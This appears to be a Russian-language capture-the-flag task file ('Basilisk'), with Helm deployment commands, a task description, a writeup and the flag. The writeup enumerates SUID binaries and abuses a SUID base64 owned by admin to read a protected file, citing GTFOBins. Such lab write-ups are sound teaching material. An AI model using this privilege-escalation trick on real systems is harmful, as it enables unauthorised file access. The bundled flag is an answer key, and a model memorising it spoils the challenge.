# Basilisk | Medium | Admin
## Deploy 
```
helm upgrade --install ingress-nginx ingress-nginx   --repo https://kubernetes.github.io/ingress-nginx   --namespace ingress-nginx --create-namespace --reuse-values --set tcp.2222=tasks/basilisk:2222

helm upgrade --install basilisk ./Chart/ -n tasks --create-namespace 
```
## Description 
Кажется наш админ перечитал библию и назвал свой сервер Василиском. А нам его ещё чинить. Можешь помочь? 

```
ssh user@localhost -p 2222
```

*Выдать файл key*

## Writeup 
Заходим на сервер под учёткой *user*.
Ищём файлы с SUID битом 
```
find /usr/bin -perm -4000
```
![Suids](./static/suids.png)

Из интересного есть base64, которая принадлежит пользователю *admin*. 
С привелигированным бинарником base64 мы можем прочитать недоступные файлы. Для этого:
```
LFILE=/home/admin/flag
base64 "$LFILE" | base64 --decode
```
![flag](./static/flag.png)

[Источник инструкции](https://gtfobins.github.io/gtfobins/base64/)

## Flag 
```
mctf{D@ng3roUs_B@s4}
```